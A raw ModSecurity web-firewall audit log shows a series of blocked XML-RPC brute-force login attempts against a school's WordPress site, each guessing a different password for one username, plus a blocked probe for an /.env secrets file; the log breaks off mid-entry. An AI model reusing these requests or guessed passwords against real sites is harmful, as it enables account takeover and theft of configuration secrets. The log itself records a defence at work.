[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (54+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075714292365 5021 (- - -) Stopwatch2: 1745075714292365 5021; combined=3577, p1=448, p2=2910, p3=0, p4=0, p5=127, sr=98, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48812e3d-Z-- --ad457b64-A-- [19/Apr/2025:22:16:19 +0700] aAO-Q3Na4dA2HllpK_PNNAAAAJY 103.236.140.4 43840 103.236.140.4 8181 --ad457b64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad457b64-C-- wp.getUsersBlogs kasubagtu 741852963 --ad457b64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad457b64-E-- --ad457b64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075779610754 4366 (- - -) Stopwatch2: 1745075779610754 4366; combined=3132, p1=363, p2=2571, p3=0, p4=0, p5=114, sr=65, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad457b64-Z-- --a3c80635-A-- [19/Apr/2025:22:17:19 +0700] aAO-f0ruoUXZj665VUFXwgAAAMo 103.236.140.4 49978 103.236.140.4 8181 --a3c80635-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a3c80635-C-- wp.getUsersBlogs kasubagtu marketing2022_ --a3c80635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c80635-E-- --a3c80635-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (36+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075839877656 5298 (- - -) Stopwatch2: 1745075839877656 5298; combined=3918, p1=450, p2=3282, p3=0, p4=0, p5=109, sr=89, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c80635-Z-- --2289073a-A-- [19/Apr/2025:22:18:19 +0700] aAO-u0ruoUXZj665VUFYhQAAAMk 103.236.140.4 53962 103.236.140.4 8181 --2289073a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2289073a-C-- wp.getUsersBlogs kasubagtu marketing2023 --2289073a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2289073a-E-- --2289073a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075899507219 5039 (- - -) Stopwatch2: 1745075899507219 5039; combined=3450, p1=418, p2=2868, p3=0, p4=0, p5=95, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2289073a-Z-- --ba473e4c-A-- [19/Apr/2025:22:19:22 +0700] aAO--nNa4dA2HllpK_PRkgAAAJQ 103.236.140.4 57984 103.236.140.4 8181 --ba473e4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ba473e4c-C-- wp.getUsersBlogs kasubagtu united --ba473e4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba473e4c-E-- --ba473e4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745075962132505 4991 (- - -) Stopwatch2: 1745075962132505 4991; combined=3594, p1=456, p2=2921, p3=0, p4=0, p5=128, sr=96, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba473e4c-Z-- --72189a2f-A-- [19/Apr/2025:22:20:22 +0700] aAO_NkruoUXZj665VUFaqwAAAMI 103.236.140.4 33308 103.236.140.4 8181 --72189a2f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 235 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --72189a2f-C-- wp.getUsersBlogs kasubagtu smkn22-jkt_sch_id000 --72189a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72189a2f-E-- --72189a2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076022007631 3636 (- - -) Stopwatch2: 1745076022007631 3636; combined=2459, p1=316, p2=2009, p3=0, p4=0, p5=87, sr=58, sw=47, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72189a2f-Z-- --f8bfa313-A-- [19/Apr/2025:22:21:24 +0700] aAO_dHNa4dA2HllpK_PTBAAAAI0 103.236.140.4 36870 103.236.140.4 8181 --f8bfa313-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f8bfa313-C-- wp.getUsersBlogs kasubagtu 2222 --f8bfa313-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8bfa313-E-- --f8bfa313-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076084145768 5280 (- - -) Stopwatch2: 1745076084145768 5280; combined=3807, p1=468, p2=3067, p3=0, p4=0, p5=157, sr=89, sw=115, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8bfa313-Z-- --aecd7e5d-A-- [19/Apr/2025:22:22:24 +0700] aAO_sA6cTFSgLAHl7Po4AgAAABU 103.236.140.4 40286 103.236.140.4 8181 --aecd7e5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --aecd7e5d-C-- wp.getUsersBlogs kasubagtu Webadmin --aecd7e5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aecd7e5d-E-- --aecd7e5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076144965681 3822 (- - -) Stopwatch2: 1745076144965681 3822; combined=2794, p1=395, p2=2239, p3=0, p4=0, p5=94, sr=79, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aecd7e5d-Z-- --4c40cd4e-A-- [19/Apr/2025:22:23:30 +0700] aAO_8kruoUXZj665VUFc8QAAAMI 103.236.140.4 43966 103.236.140.4 8181 --4c40cd4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4c40cd4e-C-- wp.getUsersBlogs kasubagtu Administrator!@#$%^ --4c40cd4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c40cd4e-E-- --4c40cd4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076210338161 5175 (- - -) Stopwatch2: 1745076210338161 5175; combined=3751, p1=477, p2=3103, p3=0, p4=0, p5=100, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c40cd4e-Z-- --15291437-A-- [19/Apr/2025:22:24:31 +0700] aAPALw6cTFSgLAHl7Po5sgAAAAQ 103.236.140.4 47392 103.236.140.4 8181 --15291437-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --15291437-C-- wp.getUsersBlogs kasubagtu temptemp --15291437-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15291437-E-- --15291437-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076271090602 5530 (- - -) Stopwatch2: 1745076271090602 5530; combined=4025, p1=452, p2=3373, p3=0, p4=0, p5=114, sr=94, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15291437-Z-- --529b4421-A-- [19/Apr/2025:22:25:07 +0700] aAPAU3Na4dA2HllpK_PWPQAAAJA 103.236.140.4 49506 103.236.140.4 8181 --529b4421-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.59.160.222 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 Accept: */* --529b4421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --529b4421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745076307807232 666 (- - -) Stopwatch2: 1745076307807232 666; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --529b4421-Z-- --70df4b0f-A-- [19/Apr/2025:22:25:31 +0700] aAPAaw6cTFSgLAHl7Po6zQAAAAE 103.236.140.4 50820 103.236.140.4 8181 --70df4b0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --70df4b0f-C-- wp.getUsersBlogs kasubagtu adminadmin --70df4b0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70df4b0f-E-- --70df4b0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076331194088 5680 (- - -) Stopwatch2: 1745076331194088 5680; combined=4329, p1=532, p2=3591, p3=0, p4=0, p5=123, sr=90, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70df4b0f-Z-- --a309981c-A-- [19/Apr/2025:22:26:35 +0700] aAPAq-vDiFC_ir7MDwZCaAAAAEw 103.236.140.4 54300 103.236.140.4 8181 --a309981c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a309981c-C-- wp.getUsersBlogs kasubagtu qweqwe --a309981c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a309981c-E-- --a309981c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076395675125 4991 (- - -) Stopwatch2: 1745076395675125 4991; combined=3556, p1=471, p2=2902, p3=0, p4=0, p5=106, sr=80, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a309981c-Z-- --8ce12538-A-- [19/Apr/2025:22:27:37 +0700] aAPA6evDiFC_ir7MDwZDYQAAAEU 103.236.140.4 57646 103.236.140.4 8181 --8ce12538-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8ce12538-C-- wp.getUsersBlogs kasubagtu domain --8ce12538-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ce12538-E-- --8ce12538-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076457298250 4394 (- - -) Stopwatch2: 1745076457298250 4394; combined=3047, p1=378, p2=2483, p3=0, p4=0, p5=108, sr=69, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ce12538-Z-- --043cf85d-A-- [19/Apr/2025:22:28:37 +0700] aAPBJevDiFC_ir7MDwZD8gAAAE4 103.236.140.4 60938 103.236.140.4 8181 --043cf85d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --043cf85d-C-- wp.getUsersBlogs kasubagtu qq123456 --043cf85d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --043cf85d-E-- --043cf85d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076517223529 4804 (- - -) Stopwatch2: 1745076517223529 4804; combined=3759, p1=427, p2=3146, p3=0, p4=0, p5=109, sr=87, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --043cf85d-Z-- --d548413f-A-- [19/Apr/2025:22:29:38 +0700] aAPBYuvDiFC_ir7MDwZE_wAAAFQ 103.236.140.4 35968 103.236.140.4 8181 --d548413f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d548413f-C-- wp.getUsersBlogs kasubagtu 123456qwe --d548413f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d548413f-E-- --d548413f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745076578781209 3293 (- - -) Stopwatch2: 1745076578781209 3293; combined=2485, p1=372, p2=1990, p3=0, p4=0, p5=71, sr=62, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d548413f-Z-- --390b7652-A-- [19/Apr/2025:22:30:39 +0700] aAPBn3Na4dA2HllpK_PaywAAAJA 103.236.140.4 39270 103.236.140.4 8181 --390b7652-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --390b7652-C-- wp.getUsersBlogs kasubagtu 111qqq!!! --390b7652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 